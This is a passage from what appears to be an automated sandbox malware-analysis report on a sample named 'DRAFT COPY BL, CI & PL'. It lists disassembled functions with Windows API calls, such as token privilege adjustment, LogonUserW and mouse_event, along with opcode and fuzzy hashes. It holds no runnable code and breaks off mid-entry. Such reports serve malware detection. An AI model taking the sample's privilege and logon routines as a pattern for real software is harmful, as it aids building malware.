                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Internet$AvailableDataFileQueryRead
                                                                • String ID:
                                                                • API String ID: 599397726-0
                                                                • Opcode ID: 883c504735e551d0c745ad95539a6c65732a9459d2731cf301ede8a56b8a0f5e
                                                                • Instruction ID: 0062a0ce279f1810cac7e4bcba4df203bec6efacaa87d8bd1ba1b50a1bec01e8
                                                                • Opcode Fuzzy Hash: 883c504735e551d0c745ad95539a6c65732a9459d2731cf301ede8a56b8a0f5e
                                                                • Instruction Fuzzy Hash: 90412371904209BFEF10DF99DC85FBBB7FCEB82724F10406AFA00A6150EA759E4097A0
                                                                Function 0099B3FB Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetErrorMode.KERNEL32(00000001), ref: 0099B40B
                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0099B465
                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0099B4B2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ErrorMode$DiskFreeSpace
                                                                • String ID:
                                                                • API String ID: 1682464887-0
                                                                • Opcode ID: ecad5ab91fb2678f118c87cafe30307bdf5bc6032a8b4830cda1845c39eb6507
                                                                • Instruction ID: 4ce01eea31ee61892ad8d9219cca50c56c28fe73f4085c093577d8a18db54219
                                                                • Opcode Fuzzy Hash: ecad5ab91fb2678f118c87cafe30307bdf5bc6032a8b4830cda1845c39eb6507
                                                                • Instruction Fuzzy Hash: B4215C35A10108EFCB00EFA9D884BEDBBB8FF89310F1480A9E905AB361CB319915DF50
                                                                Function 009887E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00950DB6: std::exception::exception.LIBCMT ref: 00950DEC
                                                                  • Part of subcall function 00950DB6: __CxxThrowException@8.LIBCMT ref: 00950E01
                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0098882B
                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00988858
                                                                • GetLastError.KERNEL32 ref: 00988865
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                • String ID:
                                                                • API String ID: 1922334811-0
                                                                • Opcode ID: 0d2ec14deed11fca5c23b959d47434a1e82aca68231fdba03e3dfd098054b348
                                                                • Instruction ID: df9a74ebd7e671321f432ceb2e820518cf70a92553c9c53accef20bf5625eea3
                                                                • Opcode Fuzzy Hash: 0d2ec14deed11fca5c23b959d47434a1e82aca68231fdba03e3dfd098054b348
                                                                • Instruction Fuzzy Hash: 1D118FB2414305AFE718EFA4DC85D6BB7FCEB44711B60852EF45597251EB30BC448B60
                                                                Function 0098874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00988774
                                                                • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0098878B
                                                                • FreeSid.ADVAPI32(?), ref: 0098879B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                • String ID:
                                                                • API String ID: 3429775523-0
                                                                • Opcode ID: 974a3caa07ba0d1d2c2c5275787bb53ec8523eb7349748a3632a31367e17c407
                                                                • Instruction ID: 77a17212eeec25b15f392006a43462fe3679851833aade16a53456dcafbe1d84
                                                                • Opcode Fuzzy Hash: 974a3caa07ba0d1d2c2c5275787bb53ec8523eb7349748a3632a31367e17c407
                                                                • Instruction Fuzzy Hash: BEF0A935A1030CBFDF00EFF0CD89AAEBBBCEF08310F0045A8A901E2291E6306A049B10
                                                                Function 0099C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0099C6FB
                                                                • FindClose.KERNEL32(00000000), ref: 0099C72B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Find$CloseFileFirst
                                                                • String ID:
                                                                • API String ID: 2295610775-0
                                                                • Opcode ID: c42f630b835068f607ee5cb868bc1865756375638ce016dbd46b64aee79f6d1e
                                                                • Instruction ID: ea460d51a6f28d13166fdbfde3cabcdbef5a022d0a17259f2d49ac263a19f27b
                                                                • Opcode Fuzzy Hash: c42f630b835068f607ee5cb868bc1865756375638ce016dbd46b64aee79f6d1e
                                                                • Instruction Fuzzy Hash: 1B118E766002009FDB10EF29CC85A2AF7E8EF85320F00861DF8A987290DB70A801CF81
                                                                Function 0099A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,009A9468,?,009BFB84,?), ref: 0099A097
                                                                • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,009A9468,?,009BFB84,?), ref: 0099A0A9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ErrorFormatLastMessage
                                                                • String ID:
                                                                • API String ID: 3479602957-0
                                                                • Opcode ID: a35c554be95b4ffc9158ae2b71063bebcd85d56b5ebed70fa951b0c006b16e3f
                                                                • Instruction ID: 5a9c02be8b40301bdc227e75b4ef3564e16cd8c569f293439e48328f4f35b671
                                                                • Opcode Fuzzy Hash: a35c554be95b4ffc9158ae2b71063bebcd85d56b5ebed70fa951b0c006b16e3f
                                                                • Instruction Fuzzy Hash: AEF0A73511522DBBDB219FA8DC48FEA776CFF09361F004265F919D7181D6309940CBE1
                                                                Function 009881CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00988309), ref: 009881E0
                                                                • CloseHandle.KERNEL32(?,?,00988309), ref: 009881F2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                                • String ID:
                                                                • API String ID: 81990902-0
                                                                • Opcode ID: cf3495a75c78d87373940dce1e95dc699c680bfe5d1e7fe151fe5788e4e31148
                                                                • Instruction ID: 69e60b152e007b34ef3690755b266efce08e3be38769a5815731683796113127
                                                                • Opcode Fuzzy Hash: cf3495a75c78d87373940dce1e95dc699c680bfe5d1e7fe151fe5788e4e31148
                                                                • Instruction Fuzzy Hash: 7EE08631014511AFE7212B21EC09E7377EDEF44321724892DF85580430CB219C94DB10
                                                                Function 0095A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00958D57,?,?,?,00000001), ref: 0095A15A
                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0095A163
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled
                                                                • String ID:
                                                                • API String ID: 3192549508-0
                                                                • Opcode ID: be8748828c11d6413f772d1c6d3a7d909a488ca740eac2e5ad4f4f7c888d75e6
                                                                • Instruction ID: a71d4ee69f03f7a58f7649671dfed01e11745086528024c8d75c57290f3e5916
                                                                • Opcode Fuzzy Hash: be8748828c11d6413f772d1c6d3a7d909a488ca740eac2e5ad4f4f7c888d75e6
                                                                • Instruction Fuzzy Hash: E0B09231068208ABCA002B91ED1DB883FA8EB44BF2F408120F60E84060CB625450AA91
                                                                Function 0095F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 17eb62d4c57a1139336f8aee183326eb5eba41d4f5bb3e2dc371a37d9291eafa
                                                                • Instruction ID: 1eef2b10ec160a07db552551bf882cedd481491cf083bccfbebf5dbbae41ca5f
                                                                • Opcode Fuzzy Hash: 17eb62d4c57a1139336f8aee183326eb5eba41d4f5bb3e2dc371a37d9291eafa
                                                                • Instruction Fuzzy Hash: F3320222D29F014DD7239635D832336A24DAFB73D5F15D737EC2AB59A6EB28C8835600
                                                                Function 0096242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 872b2f99b25395173af34e84271463ae46bf8e51887017cfd0e557ceef5e82f6
                                                                • Instruction ID: 22311fad7e754ea9fa01ec629e05b82d8733266cc3ec4747515afc16a7c7b873
                                                                • Opcode Fuzzy Hash: 872b2f99b25395173af34e84271463ae46bf8e51887017cfd0e557ceef5e82f6
                                                                • Instruction Fuzzy Hash: 9CB1DE20E3AF454DD32396398835336BA5CAFBB2D9F52D71BFC2674D22EB2185835241
                                                                Function 00998889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __time64.LIBCMT ref: 0099889B
                                                                  • Part of subcall function 0095520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00998F6E,00000000,?,?,?,?,0099911F,00000000,?), ref: 00955213
                                                                  • Part of subcall function 0095520A: __aulldiv.LIBCMT ref: 00955233
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Time$FileSystem__aulldiv__time64
                                                                • String ID:
                                                                • API String ID: 2893107130-0
                                                                • Opcode ID: e07faf39c5ae9bfd36550b7a8609b40d5a5f5ef629384866cbe7abe292dd527b
                                                                • Instruction ID: 7949c8b57a333f0eb12a914d574c023024c9313d225c2adfc4ce12faaece5e45
                                                                • Opcode Fuzzy Hash: e07faf39c5ae9bfd36550b7a8609b40d5a5f5ef629384866cbe7abe292dd527b
                                                                • Instruction Fuzzy Hash: 8521B4326356108BC729CF29D841A62B3E5EFA5311B688E6CE1F5CB2D0CA34B905DB54
                                                                Function 00994C27 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00994C4A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: mouse_event
                                                                • String ID:
                                                                • API String ID: 2434400541-0
                                                                • Opcode ID: e4b34f6fa00e45097c75802cc0c3b17c93abec47a2f09d52be4c9261c15990f8
                                                                • Instruction ID: fe809e9e4b876ee470c2e6862eb9b62b7ece91406cb3d9494937a59049bfa5a1
                                                                • Opcode Fuzzy Hash: e4b34f6fa00e45097c75802cc0c3b17c93abec47a2f09d52be4c9261c15990f8
                                                                • Instruction Fuzzy Hash: D8D05E911652093CEC2E07289E1FFFA010CE344796FD0864971818A0C1FCC49C426430
                                                                Function 009887B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00988389), ref: 009887D1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: LogonUser
                                                                • String ID:
                                                                • API String ID: 1244722697-0
                                                                • Opcode ID: e600adf6b18ead36a67d86a449710b9e24d3173691e4e353eafedce1712bf96a
                                                                • Instruction ID: 1e688f61d34491a2a359fe3691bae2f360bbcf5669f3d7d029f6a463476aafab
                                                                • Opcode Fuzzy Hash: e600adf6b18ead36a67d86a449710b9e24d3173691e4e353eafedce1712bf96a
                                                                • Instruction Fuzzy Hash: 51D05E3226450EABEF019EA4DD02EAE3B69EB04B01F408111FE15C50A1C775D835AB60
                                                                Function 0095A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0095A12A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled
                                                                • String ID:
                                                                • API String ID: 3192549508-0
                                                                • Opcode ID: dbf1b9fdd52e65bba24b32c69e5d83eb800d2646c0dde2a4e99c4c966c037ed1
                                                                • Instruction ID: 342da62c8309d6cd5c81eaddbe7befef9d1eeb2dfa9ffbb4f50a85bd3ae00aad
                                                                • Opcode Fuzzy Hash: dbf1b9fdd52e65bba24b32c69e5d83eb800d2646c0dde2a4e99c4c966c037ed1
                                                                • Instruction Fuzzy Hash: DCA0113002820CAB8A002B82EC08888BFACEA002E0B008020F80E800228B32A820AA80
                                                                Function 00948808 Relevance: .6, Instructions: 590COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ea2af7512672ac103b587eacc97f4bbb47fa8c51f96c1126c47a1066bd3fa620
                                                                • Instruction ID: 955e7ee4459abae49ca7b652d2563fc3c8c65c0e418ca50f80ed2dd68eb07bfb
                                                                • Opcode Fuzzy Hash: ea2af7512672ac103b587eacc97f4bbb47fa8c51f96c1126c47a1066bd3fa620
                                                                • Instruction Fuzzy Hash: BE226630A08946CBCF389E24C494B7F77A9FF41344F29886BD9568B692EBB4DC85C741
                                                                Function 009521C5 Relevance: .3, Instructions: 345COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                • Instruction ID: 8209965c38f37395ad3079406707fdf7c6fd6068825fa11297c658a36c3b5077
                                                                • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                • Instruction Fuzzy Hash: 72C1643620519309DB2DC73B847413EBAA55EA37B271A075EECB2CB1D4EE24C96DD720
                                                                Function 009525FA Relevance: .3, Instructions: 341COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                • Instruction ID: a8ea197fe82237706ab97e8c3613f9edd5a0541d365629c81f3bf99cd4461676
                                                                • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                • Instruction Fuzzy Hash: 28C152322051930ADB2DC73B847413EBAA55EA37B271A076EDCB2DB1D4EE10D92DD760
                                                                Function 00951D90 Relevance: .3, Instructions: 331COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                • Instruction ID: 3b84d268c97b2d07e0a3e10309050ece2a99c18db3203548c6ca23bf265498f1
                                                                • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
